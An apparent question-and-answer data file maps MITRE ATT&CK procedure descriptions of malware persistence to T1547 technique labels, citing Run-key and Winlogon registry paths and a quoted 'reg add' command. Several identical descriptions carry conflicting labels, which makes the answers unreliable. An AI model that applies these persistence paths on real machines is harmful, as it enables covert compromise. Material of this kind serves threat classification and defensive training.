+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can add itself to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi utilizes Run Registry keys in the HKLM hive as a persistence mechanism.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rifdoor has created a new registry entry at HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics with a value of C:\ProgramData\Initech\Initech.exe /run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover persists by creating a Registry entry in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT adds itself to the Registry key Software\Microsoft\Windows\CurrentVersion\Run to establish persistence upon reboot.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ IMJPMIJ8.1{3 characters of Unique Identifier}.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can establish a LNK file in the startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SMOKEDHAM has used reg.exe to create a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SNUGRIDE establishes persistence through a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OutlookM` registry key.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has established persistence by being copied to the Startup directory or through the `\Software\Microsoft\Windows\CurrentVersion\Run` registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Most Sakula samples maintain persistence by setting the Registry Run key SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ in the HKLM or HKCU hive, with the Registry value and file name varying by sample.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt creates a Registry entry to ensure infection after reboot under HKLM\Software\Microsoft\Windows\currentVersion\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper may attempt to establish persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has the ability to create persistence for the malware using the Registry autorun key and startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has installed a registry based start-up key HKCU\Software\microsoft\windows\CurrentVersion\Run to maintain persistence should other methods fail.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve has the ability to add itself to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift` for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can create a VBS file in startup to persist after system restarts.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity can use the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sykipot has been known to establish persistence by adding programs to the Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can use a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can copy itself into the current user’s Startup folder as “Narrator.exe” for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TINYTYPHON installs itself under Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of writing to a Registry Run key to establish.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor has modified the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run key for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can be loaded into the Startup folder (`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\OneDrives.lnk`) as a Shortcut file for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot can create a shortcut in the Windows startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot establishes persistence in the Startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can create a link to itself in the Startup folder to automatically start itself upon system restart.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Truvasys adds a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can establish persistence by adding Registry Run keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer registers itself under a Registry Run key with the name ""USB Disk Security.""","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used Registry Run keys to establish automatic execution at system startup.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: VBShower used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\[a-f0-9A-F]{8} to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Vasport copies itself to disk and creates an associated run key Registry entry to establish.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can add itself to the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UIF2IS20VK` Registry keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows can add a service named wind0ws to the Registry to achieve persistence after reboot.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash can create a Startup item for persistence if it determines it is on a Windows system.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy creates an entry in a Registry Run key for the malware to execute on startup.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda adds persistence by creating Registry Run keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: build_downer has the ability to add itself to the Registry Run key for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has added a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has added persistence via the Registry key HKCU\Software\Microsoft\CurrentVersion\Run\ and dropped a shortcut in %STARTUP%.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flame can use Windows Authentication Packages for persistence.,"Tecnique: T1547.002 Boot or Logon Autostart Execution: Authentication Package, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has created the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell and sets the value to establish persistence.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla established persistence by adding a Shell value under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can use Winlogon Helper DLL to establish persistence.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cannon adds the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon to establish persistence.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Winlogon` registry key.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Dipsind variant registers as a Winlogon Event Notify DLL to establish persistence.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.","Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy issues the command reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” to achieve persistence.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi achieves persistence using Userinit by adding the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT creates a Registry key at HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell to survive a system reboot.,"Tecnique: T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can enumerate Security Support Providers (SSPs) as well as utilize PowerSploit's Install-SSP and Invoke-Mimikatz to install malicious SSPs and log authentication events.,"Tecnique: T1547.005 Boot or Logon Autostart Execution: Security Support Provider, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Mimikatz credential dumper contains an implementation of an SSP.,"Tecnique: T1547.005 Boot or Logon Autostart Execution: Security Support Provider, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Install-SSP Persistence module can be used to establish by installing a SSP DLL.,"Tecnique: T1547.005 Boot or Logon Autostart Execution: Security Support Provider, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, attackers used a signed kernel rootkit to establish additional persistence.","Tecnique: T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub can use kernel modules to establish persistence.,"Tecnique: T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has the ability to install several loadable kernel modules (LKMs) on infected machines.,"Tecnique: T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.,"Tecnique: T1547.008 Boot or Logon Autostart Execution: LSASS Driver, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.","Tecnique: T1547.008 Boot or Logon Autostart Execution: LSASS Driver, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has modified LNK shortcuts.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware has maintained persistence on a system by creating a LNK shortcut in the user’s Startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth's initial payload is a malicious .LNK file.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BACKSPACE achieves persistence by creating a shortcut to itself in the CSIDL_STARTUP directory.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can establish persistence by writing shortcuts to the Windows Startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The BlackEnergy 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie establishes persistence via a .lnk file in the victim’s startup path.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can persist by modifying a .LNK file to include a backdoor.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT creates a .LNK file for persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth establishes persistence by creating a shortcut.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can use a .lnk shortcut for the Control Panel to establish persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar adds a .lnk file to the Windows startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can modify the shortcut that launches Telegram by replacing its path with the malicious payload to launch with the legitimate executable.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia creates a shortcut to maintain persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver creates a shortcut file and saves it in a Startup folder to establish persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type may create the file %HOMEPATH%\Start Menu\Programs\Startup\Realtek {Unique Identifier}.lnk, which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory.","Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke is capable of persisting via a .lnk file stored in the Startup directory.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.","Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot can create a shortcut in the Windows startup folder for persistence.,"Tecnique: T1547.009 Boot or Logon Autostart Execution: Shortcut Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
